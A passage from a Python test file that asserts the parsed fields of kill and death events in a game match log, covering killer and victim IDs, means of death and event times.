assert e[7]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[7]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[7]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[7]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[7]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[7]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[7]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[7]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[7]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[7]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[7]['DATA']['VICTIM']['STEAM_ID'] == '254e24151c9e5466251073e6' # noqa
assert e[7]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[7]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[7]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[7]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[7]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[7]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[7]['DATA']['WARMUP'] == False # noqa
assert e[7]['TYPE'] == 'PLAYER_KILL' # noqa
assert e[8]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[8]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[8]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[8]['DATA']['KILLER']['BOT'] is None # noqa
assert e[8]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[8]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[8]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[8]['DATA']['KILLER']['NAME'] is None # noqa
assert e[8]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[8]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[8]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[8]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[8]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[8]['DATA']['KILLER']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[8]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[8]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[8]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[8]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[8]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[8]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[8]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[8]['DATA']['MOD'] == 'ROCKET_SPLASH' # noqa
assert e[8]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[8]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[8]['DATA']['ROUND'] is None # noqa
assert e[8]['DATA']['SUICIDE'] is None # noqa
assert e[8]['DATA']['TEAMKILL'] is None # noqa
assert e[8]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[8]['DATA']['TEAM_DEAD'] is None # noqa
assert e[8]['DATA']['TIME'] == 15.7 # noqa
assert e[8]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[8]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[8]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[8]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[8]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[8]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[8]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[8]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[8]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[8]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[8]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[8]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[8]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[8]['DATA']['VICTIM']['STEAM_ID'] == '254e24151c9e5466251073e6' # noqa
assert e[8]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[8]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[8]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[8]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[8]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[8]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[8]['DATA']['WARMUP'] == False # noqa
assert e[8]['TYPE'] == 'PLAYER_DEATH' # noqa
assert e[9]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[9]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[9]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[9]['DATA']['KILLER']['BOT'] is None # noqa
assert e[9]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[9]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[9]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[9]['DATA']['KILLER']['NAME'] is None # noqa
assert e[9]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[9]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[9]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[9]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[9]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[9]['DATA']['KILLER']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[9]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[9]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[9]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[9]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[9]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[9]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[9]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[9]['DATA']['MOD'] == 'ROCKET_SPLASH' # noqa
assert e[9]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[9]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[9]['DATA']['ROUND'] is None # noqa
assert e[9]['DATA']['SUICIDE'] is None # noqa
assert e[9]['DATA']['TEAMKILL'] is None # noqa
assert e[9]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[9]['DATA']['TEAM_DEAD'] is None # noqa
assert e[9]['DATA']['TIME'] == 27.9 # noqa
assert e[9]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[9]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[9]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[9]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[9]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[9]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[9]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[9]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[9]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[9]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[9]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[9]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[9]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[9]['DATA']['VICTIM']['STEAM_ID'] == '254e24151c9e5466251073e6' # noqa
assert e[9]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[9]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[9]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[9]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[9]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[9]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[9]['DATA']['WARMUP'] == False # noqa
assert e[9]['TYPE'] == 'PLAYER_KILL' # noqa
assert e[10]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[10]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[10]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[10]['DATA']['KILLER']['BOT'] is None # noqa
assert e[10]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[10]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[10]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[10]['DATA']['KILLER']['NAME'] is None # noqa
assert e[10]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[10]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[10]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[10]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[10]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[10]['DATA']['KILLER']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[10]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[10]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[10]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[10]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[10]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[10]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[10]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[10]['DATA']['MOD'] == 'ROCKET_SPLASH' # noqa
assert e[10]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[10]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[10]['DATA']['ROUND'] is None # noqa
assert e[10]['DATA']['SUICIDE'] is None # noqa
assert e[10]['DATA']['TEAMKILL'] is None # noqa
assert e[10]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[10]['DATA']['TEAM_DEAD'] is None # noqa
assert e[10]['DATA']['TIME'] == 27.9 # noqa
assert e[10]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[10]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[10]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[10]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[10]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[10]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[10]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[10]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[10]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[10]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[10]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[10]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[10]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[10]['DATA']['VICTIM']['STEAM_ID'] == '254e24151c9e5466251073e6' # noqa
assert e[10]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[10]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[10]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[10]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[10]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[10]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[10]['DATA']['WARMUP'] == False # noqa
assert e[10]['TYPE'] == 'PLAYER_DEATH' # noqa
assert e[11]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[11]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[11]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[11]['DATA']['KILLER']['BOT'] is None # noqa
assert e[11]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[11]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[11]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[11]['DATA']['KILLER']['NAME'] is None # noqa
assert e[11]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[11]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[11]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[11]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[11]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[11]['DATA']['KILLER']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[11]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[11]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[11]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[11]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[11]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[11]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[11]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[11]['DATA']['MOD'] == 'ROCKET_SPLASH' # noqa
assert e[11]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[11]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[11]['DATA']['ROUND'] is None # noqa
assert e[11]['DATA']['SUICIDE'] is None # noqa
assert e[11]['DATA']['TEAMKILL'] is None # noqa
assert e[11]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[11]['DATA']['TEAM_DEAD'] is None # noqa
assert e[11]['DATA']['TIME'] == 41.6 # noqa
assert e[11]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[11]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[11]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[11]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[11]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[11]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[11]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[11]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[11]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[11]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[11]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[11]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[11]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[11]['DATA']['VICTIM']['STEAM_ID'] == '7727c59e2bf61c4a67428d15' # noqa
assert e[11]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[11]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[11]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[11]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[11]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[11]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[11]['DATA']['WARMUP'] == False # noqa
assert e[11]['TYPE'] == 'PLAYER_KILL' # noqa
assert e[12]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[12]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[12]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[12]['DATA']['KILLER']['BOT'] is None # noqa
assert e[12]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[12]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[12]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[12]['DATA']['KILLER']['NAME'] is None # noqa
assert e[12]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[12]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[12]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[12]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[12]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[12]['DATA']['KILLER']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[12]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[12]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[12]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[12]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[12]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[12]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[12]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[12]['DATA']['MOD'] == 'ROCKET_SPLASH' # noqa
assert e[12]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[12]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[12]['DATA']['ROUND'] is None # noqa
assert e[12]['DATA']['SUICIDE'] is None # noqa
assert e[12]['DATA']['TEAMKILL'] is None # noqa
assert e[12]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[12]['DATA']['TEAM_DEAD'] is None # noqa
assert e[12]['DATA']['TIME'] == 41.6 # noqa
assert e[12]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[12]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[12]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[12]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[12]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[12]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[12]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[12]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[12]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[12]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[12]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[12]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[12]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[12]['DATA']['VICTIM']['STEAM_ID'] == '7727c59e2bf61c4a67428d15' # noqa
assert e[12]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[12]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[12]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[12]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[12]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[12]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[12]['DATA']['WARMUP'] == False # noqa
assert e[12]['TYPE'] == 'PLAYER_DEATH' # noqa
assert e[13]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[13]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[13]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[13]['DATA']['KILLER']['BOT'] is None # noqa
assert e[13]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[13]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[13]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[13]['DATA']['KILLER']['NAME'] is None # noqa
assert e[13]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[13]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[13]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[13]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[13]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[13]['DATA']['KILLER']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[13]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[13]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[13]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[13]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[13]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[13]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[13]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[13]['DATA']['MOD'] == 'PLASMA' # noqa
assert e[13]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[13]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[13]['DATA']['ROUND'] is None # noqa
assert e[13]['DATA']['SUICIDE'] is None # noqa
assert e[13]['DATA']['TEAMKILL'] is None # noqa
assert e[13]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[13]['DATA']['TEAM_DEAD'] is None # noqa
assert e[13]['DATA']['TIME'] == 53.9 # noqa
assert e[13]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[13]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[13]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[13]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[13]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[13]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[13]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[13]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[13]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[13]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[13]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[13]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[13]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[13]['DATA']['VICTIM']['STEAM_ID'] == '7727c59e2bf61c4a67428d15' # noqa
assert e[13]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[13]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[13]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[13]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[13]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[13]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[13]['DATA']['WARMUP'] == False # noqa
assert e[13]['TYPE'] == 'PLAYER_KILL' # noqa
assert e[14]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[14]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[14]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[14]['DATA']['KILLER']['BOT'] is None # noqa
assert e[14]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[14]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[14]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[14]['DATA']['KILLER']['NAME'] is None # noqa
assert e[14]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[14]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[14]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[14]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[14]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[14]['DATA']['KILLER']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[14]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[14]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[14]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[14]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[14]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[14]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[14]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[14]['DATA']['MOD'] == 'PLASMA' # noqa
assert e[14]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[14]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[14]['DATA']['ROUND'] is None # noqa
assert e[14]['DATA']['SUICIDE'] is None # noqa
assert e[14]['DATA']['TEAMKILL'] is None # noqa
assert e[14]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[14]['DATA']['TEAM_DEAD'] is None # noqa
assert e[14]['DATA']['TIME'] == 53.9 # noqa
assert e[14]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[14]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[14]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[14]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[14]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[14]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[14]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[14]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[14]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[14]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[14]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[14]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[14]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[14]['DATA']['VICTIM']['STEAM_ID'] == '7727c59e2bf61c4a67428d15' # noqa
assert e[14]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[14]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[14]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[14]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[14]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[14]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[14]['DATA']['WARMUP'] == False # noqa
assert e[14]['TYPE'] == 'PLAYER_DEATH' # noqa
assert e[15]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[15]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[15]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[15]['DATA']['KILLER']['BOT'] is None # noqa
assert e[15]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[15]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[15]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[15]['DATA']['KILLER']['NAME'] is None # noqa
assert e[15]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[15]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[15]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[15]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[15]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[15]['DATA']['KILLER']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[15]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[15]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[15]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[15]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[15]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[15]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[15]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[15]['DATA']['MOD'] == 'ROCKET' # noqa
assert e[15]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[15]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[15]['DATA']['ROUND'] is None # noqa
assert e[15]['DATA']['SUICIDE'] is None # noqa
assert e[15]['DATA']['TEAMKILL'] is None # noqa
assert e[15]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[15]['DATA']['TEAM_DEAD'] is None # noqa
assert e[15]['DATA']['TIME'] == 55.6 # noqa
assert e[15]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[15]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[15]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[15]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[15]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[15]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[15]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[15]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[15]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[15]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[15]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[15]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[15]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[15]['DATA']['VICTIM']['STEAM_ID'] == '254e24151c9e5466251073e6' # noqa
assert e[15]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[15]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[15]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[15]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[15]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[15]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[15]['DATA']['WARMUP'] == False # noqa
assert e[15]['TYPE'] == 'PLAYER_KILL' # noqa
assert e[16]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[16]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[16]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[16]['DATA']['KILLER']['BOT'] is None # noqa
assert e[16]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[16]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[16]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[16]['DATA']['KILLER']['NAME'] is None # noqa
